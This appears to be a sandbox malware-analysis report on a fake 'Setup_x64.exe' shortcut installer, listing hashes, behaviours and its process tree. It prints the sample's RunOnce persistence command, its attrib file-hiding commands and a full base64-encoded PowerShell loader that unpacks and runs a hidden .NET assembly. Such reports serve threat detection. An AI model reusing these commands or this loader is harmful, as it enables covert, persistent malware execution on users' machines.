Analysis
-
max time kernel
21s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
22-03-2023 02:52
Static task
static1
Behavioral task
behavioral1
Sample
pcworldx64installer/Setup_x64.exe.lnk
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
pcworldx64installer/Setup_x64.exe.lnk
Resource
win10v2004-20230220-en
General
-
Target
pcworldx64installer/Setup_x64.exe.lnk
-
Size
1KB
-
MD5
b1b6eb2189e0f3d7ecfea63baafca452
-
SHA1
af279896cf4ec2c487e5599759cee19bdd0d84b6
-
SHA256
0bbeb529931ee10f4cde96b33689c45b0406b3b33a55d4a0341fac2e67749b55
-
SHA512
b1dbf2144f13d08b7a62a7fc24681f6c8c324b56eb4048da64836ab2d83efed80c80acc9f06e44de02ddcdb31a4eefa9f244447b128d1d73cacf583eb17f66a2
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 1 IoCs
Processes:
particovl.bat.exepid process 1980 particovl.bat.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\particovl = "C:\\Users\\Admin\\AppData\\Roaming\\particovl.bat" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
particovl.bat.exepid process 1980 particovl.bat.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
particovl.bat.exepid process 1980 particovl.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
particovl.bat.exedescription pid process Token: SeDebugPrivilege 1980 particovl.bat.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
cmd.execmd.execmd.execmd.exedescription pid process target process PID 560 wrote to memory of 968 560 cmd.exe cmd.exe PID 560 wrote to memory of 968 560 cmd.exe cmd.exe PID 560 wrote to memory of 968 560 cmd.exe cmd.exe PID 968 wrote to memory of 1348 968 cmd.exe cmd.exe PID 968 wrote to memory of 1348 968 cmd.exe cmd.exe PID 968 wrote to memory of 1348 968 cmd.exe cmd.exe PID 1348 wrote to memory of 1304 1348 cmd.exe cmd.exe PID 1348 wrote to memory of 1304 1348 cmd.exe cmd.exe PID 1348 wrote to memory of 1304 1348 cmd.exe cmd.exe PID 1304 wrote to memory of 1660 1304 cmd.exe reg.exe PID 1304 wrote to memory of 1660 1304 cmd.exe reg.exe PID 1304 wrote to memory of 1660 1304 cmd.exe reg.exe PID 1304 wrote to memory of 1508 1304 cmd.exe attrib.exe PID 1304 wrote to memory of 1508 1304 cmd.exe attrib.exe PID 1304 wrote to memory of 1508 1304 cmd.exe attrib.exe PID 1304 wrote to memory of 1980 1304 cmd.exe particovl.bat.exe PID 1304 wrote to memory of 1980 1304 cmd.exe particovl.bat.exe PID 1304 wrote to memory of 1980 1304 cmd.exe particovl.bat.exe PID 1304 wrote to memory of 1980 1304 cmd.exe particovl.bat.exe PID 1304 wrote to memory of 928 1304 cmd.exe attrib.exe PID 1304 wrote to memory of 928 1304 cmd.exe attrib.exe PID 1304 wrote to memory of 928 1304 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 928 attrib.exe 1508 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\Setup_x64.exe.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /T:84 /C start "Starting Installation..." /B "%CD%\README.md\entry.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\entry.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v particovl /d "C:\Users\Admin\AppData\Roaming\particovl.bat"5⤵
- Adds Run key to start application
PID:1660
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1508
-
-
C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exeC:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgABmVKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAZlScAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA5⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Windows\system32\attrib.exeattrib -s -h C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe5⤵
- Views/modifies file attributes
PID:928
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f